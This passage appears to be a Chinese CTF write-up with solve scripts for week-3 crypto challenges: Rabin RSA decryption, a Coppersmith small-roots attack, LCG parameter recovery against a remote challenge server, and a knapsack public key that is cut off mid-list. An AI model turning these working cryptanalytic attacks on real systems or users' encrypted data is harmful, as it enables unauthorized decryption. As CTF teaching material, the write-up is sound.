print(libnum.n2s(int(m1[0])))

week3

Rabin’s RSA

小n,直接分解,这里Rabin的话会得到四个明文

from Crypto.Util.number import *

p = 13934102561950901579
q = 14450452739004884887
n = 201354090531918389422241515534761536573
c = 20442989381348880630046435751193745753
e = 2
inv_p = inverse(p, q)
inv_q = inverse(q, p)
cs = [c]
for i in range(1):
    ps = []
    for c in cs:
        r = pow(c, (p + 1) // 4, p)
        s = pow(c, (q + 1) // 4, q)
        x = (r*inv_q*q + s * inv_p * p) % n
        y = (r*inv_q*q - s * inv_p * p) % n
        if x not in ps:
            ps.append(x)
        if n - x not in ps:
            ps.append(n - x)
        if y not in ps:
            ps.append(y)
        if n - y not in ps:
            ps.append(n - y)
    cs = ps  # 嵌套
for m in ps:
    flag = long_to_bytes(m)
    if b'flag' in flag:
        print(flag)

小明的密码

已知已知明文高位, 且低加密指数,可以用Coppersmith算法

from sage.all import *
from Crypto.Util.number import *
n = 131889193322687215946601811511407251196213571687093913054335139712633125177496800529685285401802802683116451016274353008428347997732857844896393358010946452397522017632024075459908859131965234835870443110233375074265933004741459359128684375786221535003839961829770182916778717973782408036072622166388614214899
c = 11188201757361363141578235564807411583085091933389381887827791551369738717117549969067660372214366275040055647621817803877495473068767571465521881010707873686036336475554105314475193676388608812872218943728455841652208711802376453034141883236142677345880594246879967378770573385522326039206400578260353074379
part = bytes_to_long(b'sm4ll_r00ts_is_brilliant#')
F = Zmod(n)
x = PolynomialRing(F, 'x').gen()
f = ((part << 64) + x) ** 5 - c
xx = f.small_roots(X = 2 ** 64)[0]
flag = (part << 64) + xx
print(b'flag{'+ long_to_bytes(int(flag)) +b'}')

babyrandom

LCG随机数生成器
实现代码在于

def GetRandom():
    global x
    nx = (a*x + b) % p
    print(nx)
    x = nx

Sn+1=(aSn+b)mod mS_{n+1}=(a*S_{n}+b)mod\ m
是个递归公式,所以我们可以获取连续的几组数据还原出flag,三组即可,高中数列?加一点数论
https://blog.csdn.net/weixin_45883223/article/details/115299389
S0=(ax+b)mod pS_{0}=(ax+b)mod\ p
S1=(aS0+b)mod pS_{1}=(aS_{0}+b)mod\ p
S2=(aS1+b)mod pS_{2}=(aS_{1}+b)mod\ p
以下为方便书写,均在模p下进行以下为方便书写,均在模p下进行
S1S0=a(S0x)S_{1}-S_{0}=a(S_{0}-x)
S2S1=a(S1S0)=a2(S0x)S_{2}-S_{1}=a(S_{1}-S_{0})=a^{2}(S_{0}-x)
注意到后者多了一个a注意到后者多了一个a
a(S0x)p下的逆元跟它本身相乘为1,这样就能得到aa(S_{0}-x)模p下的逆元跟它本身相乘为1,这样就能得到a
求解到了ab就很简单了求解到了a,b就很简单了

from pwn import *
from Crypto.Util.number import *
p = 64999433139797068147576269731948390094958654326970231465808792590598519729077
r = remote('node5.buuoj.cn', 28748)
r.sendlineafter(b'> ', b'1')
x = []
for _ in range(3):
    r.sendlineafter(b'> ', b'2')
    x.append(int(r.recvline().strip().decode()))
a = (x[2]-x[1]) * inverse(x[1]-x[0], p) % p
b = (x[1] - a * x[0]) % p
flag = ((x[0] - b) * inverse(a, p)) % p
print(long_to_bytes(flag))

knapsack

(高级的)背包密码,不会,贴个官方脚本吧

from Crypto.Util.number import *
from sage.all import *
c = 292032237605703789031443546112168465662583427817451138186159085483944596334899153983563673441672190426682450375063969461376062147027084612402086056661404230388212669024682288498017434447903079894895044646783044615700960214968206461515747700863707804674135323403322674848342947433907419384351538542352190054502
k = [1608065985136589955518636876548002749173398195805908561413594566081660968014667899832608099402330306643714300075111493399031018875367895290978800182262583676853981874524478795562164083876724225562910617434721559348811325228478100840349704502825475625301310959989478861007648220652524232130866274135218984561, 2426667349302925052753129094681603564581547445694425972149058783410976244113409382609652684285673268926585915465121568674105405583249932303853277106022465162299776054880646164667515914638855621656976695492670793997554806230559887797430130967584045823908435269522635470810929590225201734899469120862897857906, 3429483048920859588228800664056147835206575859139809437729513989612905506968030247732277405170588036945046103148181571731475515968018728356999146064018705816079990332391171720831697179560208441190869409352610039321524663718448744716582427839773919710116270407307201813934309914325458374662174960190245957222, 56425010956371256448246243268037781632639922767089972857768932087073862372804260941055847027639568892620749001152456412613776226413648996114511873854390857464940061288049524118854209263921746793476386468543364294684706273576618917594983701530906450790737740373654984594497994398342234224269852299909786917, 2490148405966221496416605271766917944760574681421947779308643176791508974209226864249738961804267751531920519607253031119552656778832611158482425651360225112014889722067929942129410647789542841451918095993121030645140097940914026737410542029696262008354153670514285804682813068751684055223569331294281905118, 744335516743470311433495353720410462797590932472861071020740460215850064443048990503206674029768738281613724459334902647142111609386032626419807763430772690331198728393460206599560093644541916308699753208688342851978033928606776623217187488326243128140520766001009008201386016425560302128789112878698236289, 3811275049854002124670197266442901370413146380714854518041025464151849775536270057261222936366704504717168540821482432524581823593068766111036867810233424188570517910875954137654522213277153239298775268202412265276391969412101608136450034362297594484127681402703758637422994850056368647615489523794861880847, 4736836665940826041171694132923988931845101417647374332819683867658151216907483131765392822718944507370242286701332413933742097451162974561725364631534151059773942438038783618842467372195820647253852754681662349983386761479952007635484482382467925975261261100119940525951529612029111682683502811860704744107, 2184288239784892480695351146181522343103055473472054415892055011557076197493348610705780911639069852142681212813978124320590741444078993617676557686712572852495709125855358826418698444456009029932606748574019720427857423438968969137406147167435728319431977018686862316554361964818593535134605527966283094812, 588194102339696583350135841824327790124834713596509154434237624805397239340526856351652054792548887203985807293311816082012326594259020613540184041154797618078327175677613074289570022322357182995479906623119955070230707330622384565298411040387807899564480684801466385397273974163223208276864942123556821984, 2077906466303331037266972319970279217258043930377897803588850251077437486936839431262259636827780499338786000900607732211607800334437439411320588909761412208903115247316321339144063222215148211341360284840791579449274150984227297525853407129758195258114613336922940637602426813584054603519438429403287901807, 4060696287458178132166969775611183857321717695909596307983521934391374906105468401724669893440236137597759531026401897954262009158003862889711338109339144634743467096248961069665302863564279743914614929002755913987145938151818768559151108680179120567043334062947260416139148527070005414031278334913676278825, 4648055212181913199241601922647752559148310859063413915617491531022227482221369706329584019871516807125335049899238193299170178941865351952526303264382540623662751970694196678643148804700140310686029928338258113239246369236839815299421412433228129370572769064025027782499557120467483913439554278498904974692, 597176878045185163079857438985773795710566287596407799734356772474742131529190202967137742454916982072691342662052310864747435205021028361215252674178315997198269741467302622198726752215953160339956800052041597499968585794961367600105538786381642026152409490766928746822529886810175008512823872740471937665, 2910054858527388830403932368779621604363339825851733588186642536470920279459927147643083958572082724465912571199462751727511781206448016590724896631420215562383093134176059068836185007547883467363788641586218097259132532988047680444596481336102344068849705827845373152194082875334989539786061281633088702207, 3696225688659541674514429144747887228548438553421347322179321479441707736085490479925695068682857925820906600716811206668674362670255748441491863826159297563586283856711895274967453111525058741957741388117733577248416227857299641721376648385102843604523548256761323973316013492759706736947255531758861421477, 1264925539817716129014576497035166821399904498843295574478016769881855695449072100438634702685104077900942950531746967236836367541973173252729535587899140145556274961468172106138699157373099481772657234211840356840928934367479697752383329641624088906300664151102190244861916711255701268993286008770967460566, 4571007407218171376424110614619883673340506723497157430034356354946308188791286500930618019768782785808738651009380531664322930286075573732857533002268527483303325125815338437710383276782094697464296556561635650192997376958252519129067160493545151596993469863677168612507678829366504521208469249583156145062, 1607275751862389848931579421908559342709368592462574876274965760526121100510794144786052958249913960025018042087109590745931445493710553976077015732888075612716822213569024944317709696157222658354305384754436338586170866943232611395186803895850706105104633938739700570617756272254018986963765629888951737092, 3231482882821525799296232079268975132628226834188813042834644439762217765053533385326968261700098026212043361747011112721207439471171509517132716408625574448212648885013610454405496823675923432663129324575017177361298412424859120473653168845998318565505904460291219279379949917240714510026168261144328754054, 3520756943869114055247771507983524428603360509892140185215072107632169908164209572971189033766284497193142577714214719937690632620807383452941370389221221578877005020761180420690667701357084962898452818923425965250194938713381636834757219964144287681756320982371633697825501678773072609037834441639946225339, 564403960688872564494042565904665280137135985980812477996104058233360726954980651556261866550808047905203807135975257955628888925792823632901368848326812395864809366082008793001123947120817643292945421197846185465088798386204955957297160837369871862119608719565286233632933483485107886825587988325566420769, 315959983412675584879150300480980412474498336983333058244546717323455930859057635392845900347749179949704745226560004600224895066675818550275520877089383803806869595787780164683206194624514937603600847800253240223046758244243173853100476864620378942952204542538466227047478926569550153847751719869006440425, 1359018660778713519182671363124066408395251129592238792702570061458306199066654656327632765206370559628006041477544326679409292399624549148446056002421371779947111512017053024997311782053295887885499499900871425171459104733621657232622887633643535171009046754834506810886208598640313323992402587826510775114, 3143179053950367778166107548875625357080442600180871628766656421101359811522386849734312179769425670257807747763366111882218302544429356682960973863412113938212617992279105368728046281321277793429612514556884875498321471342186005935474830535432685394050401665427753950451870384061138957671000505331584279579, 3424041059481832864742209846632834428678464465053787826056153859972012437109619845448193496222177675021019548028304262054465072804764440535807084060970023895403210534439206560638265706687193261054302798091234069541337163405569239043076218876024343962544888119971652503894076571165979094263390475575893193397, 3394972557115014896582730524811582775165719006608331601536895581299976733846094213905437335060330704042911954267160117024403703576967676979692402911756772597787115284555393956162858666992823855559436532779737873277280234871340407793612861369949533029425471378372119261785736583555982259686027963800114519102, 767982683763338160290017550677214093769106704491468427905876141797664016593400484148498742145536603311483520370631640194250658359513883372410529317557191238184311706705838095244878422832069949895389250127322194863186729472408042980350123307774174867627999479980065280115383136125967992634632411086694698642, 3422540924960544612834585123729733616645553900174459638595137499785110833438504509800635685035170980711379111110998342973555998772845994627938368908066944974448421606476842842744708489409568114738191780149071182251924924154408311173667690121855018031507506246608870132949759899179937794826047342152620292095, 2076628142562411431193260425909220171296705633984743027123722251828899204850932905454098139619184381148082735631705741868953008514407774642601331034180338211496774774791222051968398724513483230081252598969671908696508915091480770301702104673383638671583594522919770174845091152921903576965119090911034877494, 3189000454894790851508643883003404757686995689728100342704292699051819454370619492435584632046952795828014792724252564437409669861386664128425419749205118639851420416805611265987240650591570288819441331386388096898355300213251314193247203474170004062127830101296310662295136957482763725859911828673870073010, 2907150768758367886586716856492146141149987720809000627386111421643110094118983371407767929904033371916068536282044312598041047375502394605750826924668621476494681229069074757407895343467711270265146813743924924350467166961246868819544022337777611791807371441063474009314515450764620220073636926521653862968, 2514385072822938980004922507739039623213197750007579507863286260748435647726447515478421742855973407150598083238408348940948659789166184923325380104358023583968000101986752922281017736336438115334745325808437403756600270989274248698777794299729025975621235093801536125828223010916623183270792167823391314339, 4129101408426925717270552379939869969462339505083750544797736541259757510320156554069476949366400728041791814246488971033168156032323532108146683445223635246667528163299430626189843150118857560146372215307245784118949072729530757857062091860914386530146966295084237748993297755170788155139701609454887642189, 592435070792854036461902755632415150930646219825275494995704405210968841040629694144327928092929922909898934019797113069018676965659448941534627918560192454634915263194744672162906748245323359801539030421486363693479747492739167860076793115084698431784280178395907832496292090848269244845568496776121048420, 2865081789369306893154991033764735467685871707277377218183223375617779981799973856854786718581900741247430593563538242294481420170548368619693814116986102431074746102530574129385108670674829793885445823488366746211939790255318819470661864602435004540416394683778155091007365314457687943582106086383434350861, 251391258714263204956657192185231188943160321652135329260264002476438499179758785954858306203909644226662633694242501403168759406433259397406932989254919691213227015152420952191840925766708845560415152018030431214027920499204307959550731819022116632063749364551316540057073676174948417613616029204682207498, 659384723012287778982874469102674194729642950765762947339029438294465624178903943230781035007197453043407917087130440696900821572650425685604124960327195084069431360651239951933498311555358398796549450526062345075410197217697206633409546614255593820522021931451531912704546349794754510069083609031409248937, 2426015109860963685265746512687937789091377922049478006530805180879855604062651538855351907709057208551010681642061459995570015242556185123653554175228858635684219019015285945979801660351775121696847472734754301551492595986833606031144106471739246647563319118176667308020497901939839988917087746181229065667, 2525877031078673287368055372541347308620587609819404238360987948937210254003467390351489023775890685319458157199265530962051187524661634143415580445422222118839133913670988791987913550492250501569446783701526486015110050320714740192346307908359345974170083063227017143380075781142797561742757168591170431005, 732768928580119156094714905470431755951220001695692967254356266424803019171824186106635920047016493731598322961621456136045426053182174281299298171457892943035628932693593002972569811423472930877675923483250320285199134097063623242942245320335617570876006316142286141477732903642514475998396604403875538126, 1713075318163482543035607888694028734282694723540866771257489312949731729867451895002415031438072105821281931406090644355722934364012514171694359201723633543790142137093107490826535303014605095659846137106308559615589840335232832636723868215269579648052117257204264424008595205714896388849335458748497822543, 3206030671128984113530830309177856630061151077272710507654391758860197005426017882446786133353799298831133785598099494440400390320422585018218554331274457777959194601952893538104960286760312454840928281693976980369524299791880038234512870260756182855709317464342473113313260630724970948400639684898437174131, 445877602282692935696209712317954470877142704864856891828249426135605594268024261646147797545280327679388745908767233133100343152307397565685762453671712145805994933944113578059370014148275504577151287440989172031015611066447856005365332241783974336289375636169009439591968164684890905627670506826067644748, 4295806455136688460282792834328399604062338768814921438926176686908423403962628547564739585989088193984331621676431469210575448270423176766350053455370528181528187650287128113842092773306387117707015664608767974649475285232110757540420290085285387277052398369374412839149430241121901070182878177779766827985, 2315183230747468539901572410823712634195405604813627486581938983970506769088605108642213603692757389396301765946984918156979117789903373888118705804351795764852912596312935816764673348499015426746456365834049611680560504798561899893873110027359835176922898163290326344366278162799640783569200922149384205009, 2709883740389810279365385940437096656562788270606810498693427349076113450585710362125999434154172083927380062042591579804065240386305725680903876683008041411459059118387545472319436308853696256813357089080031992773999500370274225231471068370333280353187355400873961632126707988907859983099391762494801772868, 1905877803809277746039923408128559460261246253332991558138482099322411922204404256653319787704004392297096385734814888648979557467359768233865757035895316271195939258102324258669679336576679363692755368433284226911087680896182728662504500499583917681898428546988994402228245893257641269710985866908742058351, 2777093303340675091580625532323382682129691864696281736202581450688282358145827305972597165522439567019169702252499397105808228982816274171858619196572325252090716164754428653471484126322475352179404916448695972332203909050954267925410042960886379996367981748227262826353064727267433899571018034865132704531, 400099068637092273133972962113072182359643459523164348592014836450122186206026122394030834593959378383718768018630906909662176542621471783076517321930844229460041330895088676945511227366577477141927693769853360094080373738130986776817183221244382063909546208545753556333958009848802143241794378778683932535, 95480232861080887148358949937991373063092649181462448751020036819626579067760501815779519646268230398603103950707525204526097843797674809978090578295201129966765712862260632096215874817242317309284158864004538124514667981606709682660369553173628534354955141758175565938353910452585266775291486924040287287, 4206564390274181347080014243912076202774818568255193589212468833402308873515005261904107407350761468151180411785518045896793882555293831354808573632047790471914302406927630174703561525556261153135936355723670843217968200793417249577620759095486376226873702806966391622687408670670332024471946214244360570527, 769581546817283749107779159740174748523198927410082512915961922766733767813883465793200394139576122978258778956759789880193669138236212424204795874435723563406044571312451089777122691186730272985486340798548572537410198342282788909076007414314743130146594427350337285968643087714868961225425427051443428871, 4205588760010753570183010447576871563608252114372802716375294049628998583455681856572076435197770950017315712210184921961064340013413638913213275784072055670800617280198498410976367292113059360904240872793292322639230272883074388688191241489247501227134113953797523584042177459022347457719985960527177846367, 1673981580767141935253840404067283389285984798963604802473535562441841136663982533621295752542370430497885253698235901516381162311845117952142117326856590929543090980773849180567395429627682737967221875012257442922170543337921831960914249282293152499404813222987199710342332861917285438024389290006917774294, 3839091611022961244047084056865475442636219805237296670005081129521094689404090527874429122484021669796230275449655356421559023294473222085100916762186074843297468793318851172467512250235616943665351451217851892892301363893666565008610824180691077225750190142248598518041362314450625095641688369586817758181, 3887416604133429389606449254495559458167225845439320898274897424317852791696295373313509870873845629557868181477072374026232142315609706739829084179756122068214642915022078095234288540810633350139229158796821451877239399418934904305674776517367438666855891631003570448701637640176452185800424196171496804818, 358492333565676008138804820465560251866006888339882470758115920308108101540837655175739996382881415152755446178429914320270937738321390695745154623432872863053912132168831555266403803315291750052720867125153396272471453072535893765701565177051817002933323643618478950737883667136067774178095466493459619255, 655812335243508201841489724919037171123201658969633886949880732517267083890765645593593434761785507515535515565657116283187784736178668333545133076273636138135833987984809848133611532643367284325904339405911972668756220407073182564506316209055015014469467889679610596073319819057883016116200501750860612158, 3113775244641122181986381191288292039997042853349966089486819525049061751051054873716149031919321626703544417783539774253194197296560794790000355981335530357571600127442879571785843011743587545022436919426522578142377799506957957999574030096426711613548818233897612949883540018947887118158145895368659001913, 3346536951357092794922857686071205592427326377071985417031573600335117248052742314887234312517253459355498430124358526765831884843781046449528488703718774190764032463366296311530766780372073925895846392088965958209670093159081446466328923256632162349085747377661326885434440442540542634700414979519156846378, 2271935487447997615072827715629425090467014316320748569661772071398835781211814130487355070035384524783329644561795490975450269915996630916738702592546834206510451616435749464537109864004197818387853698579320129733065396669474592526208512959974455298956514608692308826341738026708214485942082640212151722824, 776466492143310072596268802159330789564963600828637627540853399297900489203518721000908793370986461631222499074382757467232864517137871669997931139488027084842942095437762256079350478191749823969820341524844810742948700598495048559883397493931440849395912715652538689399792836947662852820103532717567990825, 2414274645882519519084023913396357272407167832626523088150811990492559442026397060738140352663005223129337187125965764012914780402110158227540931469017964124622910527406899007518667711067230671586565911241474521955001186241607041127655651458938731994650169928913125748912643646524991538893335177389904412170, 1587401214609797602331682440041479743512176522669626586231108195155202838917998415252279686533695314095297559308594308729030682798135639449094642378150127492601244357366175151522933633345524386369722790804782728844770761877138025423706525297203340243728319358418982837426599728607392540185563391682179754091, 1276538048517017724799741818279571647670714435038811528782147972756642391251134331211078877513430205745909112356875543624846934625909319249857420925371596921159773634075408031817229527925246856861069484405721039888258313585591750990749824522485321295837665778185313292953880124411255737622409525193124459735, 1538485199904895231757088486985252668728362373981931817960801712480113335144533151864247552181700949983397258308916404658891775035166276951736469913599712794627172532234260428887502063542242388200715134922033848610833955337511115662975240925681126009991412680235365215325155354418216805045691690371175736694, 3206304631930048482883026701884292735383942399324272782150656595986130488178312338403753056282079561305071127800552734066603684476317468336439123025478022512848222910190232348231941471763205513385207943068182799579334996844368914081954765697685511608500913811387200371518850567627179307512637861874238561003, 4060974136109469828397749836390448767241682974331277126152803469744907898850600258735274223294110211845166146970522493710400206529822968619805354770338935377761626067850932707127865463424756008394428715555169827742966901642024793693796316287646900078900367177173010131730253761853898589232594239369879107744, 3186685901580513856509872460979635165561061950606904814133798621836392578498358298660957761557506177619855027178183087244891177317508831823775875116819379713319584842647833087351777216785095435169291029372340194446221915994696340583825222189631540468961340287055426423943291779572102944050203195317543086354, 3136611334284792133367261650890227232936288665608393703140476960273947363995950090616216841862364676224975998313927496717442151280046513059844234925813488608538868806165304615153462666921851828369973348820514900945220768530718340515375059152719890262379622822092495480472265940696852626966083066449081013515, 1331269884708136405117905393673690029448536867574991764756810112456133796939866167105752401710654064799841814208579960739840945274552356162539929238201263094768628435429424780269405617728361664291326922086470728054557840896594861984932337019178564604767425068305896370361563415307622875854960715955519891364, 2629686842528554368371212649266207118104297767714724637715724853710062224883360018658184081051834552922938103680625457768521020704489138289673236192361797218197291790011899341547550168847195307194675782016724355461838129391692029228873360080499876909101598246901009730064927090298523336479377558017493242738, 1426300450885754401333308553071633549193728206537905148455464373889158946625349170708739895297669403110835467058502210376906639329985356457538282521567307751689596391816389876022943463820616797499242065593983413552042271136651578216676477358517644481445202546424950276409332053665700078110891422676737000266, 1115143586269457046388508860118731296403702746525652794518901402580953108524846557836251872330464547316185544242979242626492070655689348375188220456348990656723775351040670864330649927682112162394335389121196801586057211045506076134902459021977861676061786586552967325367078555699852757953879038529960478826, 2367010329759044141740459116302334258738079352309025401865180633681967129718049381760374265533928185763470126970233153393433362149316762427869338542193490619295261584721180390642443116162125260063543158277093503519396667868754170989734908563649702639506310182324432964149001826312565165291959861876316107174, 2369956571182687113385124970548942876722086028916003668607492554799566426508715514710684580412196675124348306094302517736377191146560033416998222407410700276968032415018624603140969715321560855087801587002876000914374065245540460164369067028055684387229685317408498952218117392120145026141932065722734086573, 3854841350561727593245891090625338537089363579767822034014398089229606355892699347245263968564846767146741783584492207093850447805904831377806981335000796755720650243118052758205725952167889135780685666302792946816677759787075975030143263198454358444000314894537861184800223256200612550729345434612069392730, 3401586406886873485507776328101144878822167922493875544544481751600285305001073837485176747426438942163061719012159262979825380870846722864659278767623249012563130053380471007633703779101021876571208363913916417267510669400579106416154511984480469979274724842386104366805464432583011344082510544510387434007, 1780411204742756113339719485654719323514049671655752818458571719669782429217232128095729463729175101515417880396147215050401574197952485666683528215878232167927536265615448461472688261492869669745117088492146391814903227508319392827577962305176903913127589561464776045840282375141308226722660431066262879083, 623158759606146964243321604792792604328830973124825909315869354153270589280565795450154648529086968171949619658615994842143616224671760829560230125417151577087316903718191831791549792534697044357146454674539729006792403062341153282797354669567567369833711554020746696510756773687293614969485135144052897743, 2874962898871141994988116678255360066513926880267417781711095682301520155111915909397882230832415313912219033418575053452819516802259871606128751332802897619812935849791153289338565346476601944570277879083700171017502164694769285858947683642556357324745291066960174235314446585743355585531499937629504399370, 1615873108388769020548178055085255301216704367824197683726890282097172769463327555760194291309353870050824187347172037611766085820383097535855545837318116353353694343187424225078883645748612609371762170267307170926217729936859847075738023340269879295777597249718746227403886887371940212669289587365700336993, 525108755827176036474671732056255094683730135486249812303654723006821993795522820737030334467297449372017838930343899416337585019857607592395449704179963379244795114955118499384308808794611614840974952064962588444759072806096028616305005381563004924825123136405284139928572887251958119886649167419066264050, 918332960100982527049395507203189384302050684796505973689025480448942770394500284124542244610198643370972431577880649249814517167066562245328653608755518782076648032146285166516777171524626837608390406381647370835132346441302989043383145289041797236626680748996797113478650559151911278724265910924039127968, 2964248574506349048215911748681858030717673430993075417633208945744206516083608296085695157611633489758222354627610441817099800915383283328596970528768280941269749565358018402239014420312405894337849134824919249556370981771263030467535268546970389952421040003308715935633420033941510804561875679537460227629, 85665955692217427570037812355751530568998228500013644584147356950933469172554530676771019364954385121428244865258438404239942485976299803575517277958126024127109238972482638034393248928113920562771287085970582579067523599702816353552740408438787627223203755224709683116502844765225875073921733510288291776, 1763943494604692994558621872982798463235816310714375692064549191919341993947134592162469858312972660109598183951207784160628019002660431100827236494238014623524191469215095833508165235070336349362263939038790048096529333609574428275793764139665746636535050632183112287601139230756105345025559451706550914156, 606923858621794264570541021686438631502912948498818123657023638062879145309126363826563257365286610999645566318746804446154433882790270545340014348128615509076244518224956290640409140029831062729616894547537789174303510214823420319429785589004033636113697272393662370565741003642256902820956620210189652708, 403098072653989094288183714582206220679599474113764825413024853328499559984473416836791800390277515326453391336697640253896042054890073838214864225766313505639185540053181444764406079725494187339818775333110670514208939501092499957460680746983186081866869392651531198208689960582635061807336911790444819536, 3802750095869086884040470353333745942674745252476472395477516890727826505810732519134379078582926912343947483192619655854190402887148649122253530782460469537500676742735816957518111627010399987332853388510599355755679930555099025923487892955814165819472594095267490155035826057130152101370263098336224813297, 3730995823536548661822175563738808106838845593353121076324363704001396825430386886226305213325666763721771062632861969964485873283371305730083997043731596669400946182482905592266843231617530408261826466824511825625749929784524687610639106156253118700858803226533934803947417145298167870161663704139905709112, 1322348269608151019333143719776720471733568839890860001177453681800974359597399636795353808813345128767726464312262341033086818749743612281546537757746082097728626164835544030598819372259985282440131245734895720543226525305675327557703491101436954799540257857447106695510744876477791246952604642548517777265, 2187532324369772192109362383502910358761719357135620664432465981190564255296919325332664558395084272746148875600367407596156773944652502069567589465399990659319650324487309687435041776167672602397747095515206568505442133975028199907118404997766553265198639882815810048243944900122296711574694315905052626459, 4017318794677558977013867043418972207840927372711541735421439431793406473778005706501864098726963405402687542037494320743121870411881925166843498995992354589312656358132814140300143529978477877521303799644505937601507857064299255781111613624420300440014838932548127523361057829697679267122861876479242380658, 2430128705462412652287477575261763576389056144597967838297896494113449406808399180672912340226138107956277495521817514119747679006625357339522921454575143364790049283095580648136916188131886208122247518581854639215143132230922955309400152105405850523032095667844018220940995274709416075786937888230550554710, 2652178802367465301406078340344602434725664836936174263224692924089987014406117774192440832617793531885890879545857699188157282649238939181865540310623696509724094407251187369931292399971021045192711056663182477847276142244104062004711027451084851512861342190509264930849032253443927881931106222150870815318, 191925220844051097207085741701656474647893788676277143872559442517991620533946304823009009074609877798821254395075654432416969716696154768935019588011733952421539534175799025579751712037142898188099888985332837211217458038899251885313818933193487793652899839688259286987811000672146528059867561745704800847, 4700001329203449823897046799249167755174157347040031978333005686349825562441779588981273351676338746828590309810730628204733786749329987303111464709565849133771004461803047323376954180874217545750726829402062954020755724772580157067490262389871930395114135174882440632548764502387107809999275589586435224524, 1514370797819179265005780651653679547428798258041680777707853169550804001818520229600038896034023366928886117739651071439593049696424604728456426054701066746773009773020744346859033796471232997192661023811138687995001482950781435910288071116324527254442299499376654176321402010813133977758030772107419464223, 1223282901084393480335762970441610624127006282032598303750626701000787826287553539363357360868926332771759077486653690855316027038047507680202080357428806606898020295347207373530039181015841302550298578886695052220141170718046335002983057099421811442090271306258364247932396170245817091736920511373912120957, 3598088763942891828392562456578483871043279295647123031360776381165310858866873804302088665850113458196635966897363391158279076057731054844604707750315009543218436617611214266563202644673177780662983035577744533281397856370424789603151275907834278405654506452612481274254757768234062937542998402369338197335, 4336642681117530496861535770064756564581602986614786425545428712826590012634324094621781255375448223880300018520354367759126953341623940175920437481170734538872963319241140550304320190005421049902604135647415447153863597582003367350769636781552913786447153155649325496015064730328212167564980468880253316939, 1249920288419842447374096803571221709751285198488852977619089410853584632170019036736305608423292854270957648603344259152861629700801754233674810148713291499418363665368223289432719814444392217119805282516738529313844955972988370224093861533863167801518348176341799761872160174837610764883485736043711632724, 2502810212668452993450975229587908292485784490924603412493808287300154080477642206630756374043599987904773705177024140295655079810785523070577684438977036239625979854070165009280513236215589932639715986087758288858982428149909016295769361023876651161229613303515431680620182699876902436355960388343049971246, 50932736588134120255433446056436386262390561414568792335984352130496719447833939884173667687970891513285867898930301055544002030525398401674671848649141114633856469870953515878890878374674190392734778654841953420820270048777151167931205775683906960312458556762340711915204052805007089359165376772710813471, 1494051188892777476195635416272222066980239156573602031084117858128671443353852854757378364886294041683332121516618537137970571537120001425883930903618215733791084533140074347151693612285584812919187919565663696266562728072368178143771027013579852520759811905939834300772299093139104325811199173673334723922, 2083412552002380743897465680515484162033582716676604073124995757861032023309444631716249909369362949690910191965131468761290144386687967971776392527671636198157843668846059944713312720342203581751583494954672207922741958550492124890174274428017030959274145755568959645798804350350413982477411362789270479110, 4695911019493998325985001720414986930035224720342186415931066615334019867978396900895979226796418459696139964388784526400539151665999552393267632919192241551638418757909274017848823899339058561363927694022926777518716946084007133911023753510399584729574401871468518226862575569158077377466396134754781425894, 4309386081780671213647994846433544887361424311229832164645898260037278487296145430712070488956322358088712156367186459610930188043424694542983975232368324115831059074052265619623343760551759154091215001326082252762589148972286402141953010845794108917743026160750593595096602422465714014934340877608151465498, 622333535580757327995328130451511986553212769924986569124777563922727273563047396226264495279644966468533551847730691318170864357102249741011681107106622874071998403497864718544452091381960015467549938736184401078977679009761141781138417167068761688470494704816426901854997897911219839808081418187042945784, 4148152136942359203559350930885683970014622697145785184772999585525643429356051857345217971561869587851810841935484683746801701989874145656141937624360968651774466733779612451649492510828598916958933132460390663390224979729286139386745044763569354851323490375944716778645246456712151651885391201528629661925, 2046340730183149626477284829941111118827437898223627893560836091967766528103042595933323988780554514436906885983591183966501768654678422728371201275208923380591512438200694222843043260040091672419539937430775846558658556748118379537002341781377710806327318637998638137439217447688506125628564444459760516588, 3061066754645159060228916902525606581523739313279460251443888082205067977578755920108258496925710321254028615220121232652331352860301770177699598157550586023078990045348252353720536451083259826593020195353060366456284274491017689424146989470511798167279969181165497479567323359228931388796424593978506358890, 4813934973568299298803672035217304109071304281994399585865681083788008764571077966748038943656803853120074441930979072825877891175473418920683794455210925847613147145276344831257202059450779897385558051888853741642018911944323957973759951070589325678261058798345882293394582299940564992250093324565082178110, 2675751273784035245371205468006287675968457855092869961530330122821745306938958868211595425627849948677856878631444019243704007151628057869647832965158023589932499969221168758236276071194669034099848746341226327960210330457418017245646618823589227965212233504593835044265577221453752527477898371799214591498, 632595019623444639690000731400841987902404297394530890990726589457294574937907054415340270450185702986756005312136060634816850565126220068753380696137523157664052369738021546881425256944407902802870681536449642192691547131039750693842203019568519315993943594044127457974617881506283569851054248931967092465, 824344425852345481894909711606131824317929229981798858004565905149329321241845651015016699644572952104864936622646018422602583300855626733758885977761879722356620164110957452521577348649581998980922342225154588429250742824835012521982480452482758905763388357534394852922915861392586726038139245583954747547, 4648441459048403193053411411766992180972846525653200465612190628868912032291294664865154971461594182717571850836122914505829908175105129754714118127617286357855121973763763228630368858775426431648971962186935468578941753369482662885072860883541971622890128178150178273582498685553857842412514818801142299095, 4596109863075644859742080110299538593831255726960680096195461247868805453661068428047393994056780242248917617304061607403054781332292277833511862421341744544031534452886682517321202068479143723902517554671018018035141935928347364464376313169650242555534688869928932845291408274161266787501340760520625282057, 463630853701521459863531359414083279788548699711866143708630585958264047911169022360773190143485065261971209060024338504228898406234894181734571459295786113238476088275824417275078053644007282110057818184474473233939846679253848664814845942418946002168982888790445186135574483584768054273770091375054272175, 1989228604265179848978172719583277022072693871108199624356504965116026084906203386880966121640375405489420802721871505955549138169314702796015182237682976479640203258988666957517238352060736126467469258146034610481919886873301024307677325029906818187694865110997934515213517437180852912801728581228778801335, 2894684424335076689555546812175766891280708464237541003076969343783199370569476167377429905885141198109867275275696317947455174215929006585613892931580025088122220776135472915567217505623803043353093028106606166990376068121705349906446853892496135688366478663761114289270463120255266642200393824764273499125, 1485022326817274892305571279808557286065465781226887870961052901484086853044731623743486768463579451448555287656795112082483966474527371194500076802338566588180098362502511579511901559413944711978150228011494104271269860800561174312424396676705136591951948960198957282250278873221320881101380544970959246995, 3368629287850429944999771937114703571170949822812598133065957174765555595301809597185287120574016465081754056960863303629037318913208530571508767900500471010585152357846872472990049346231910329309655292783115115111996519558631109492424738793413963715150047150880265030004209646974500342930517147591436673529, 2809231040049855737873300345548115561682630361605397586919912682578627834607584754659968436265035640884946275177488087038699009819749852924865423883707259465035359061758468368825244569564299307412295082204217012608475278667698416436469602244689061289454777576189688854670730742241137991322476896719592292332, 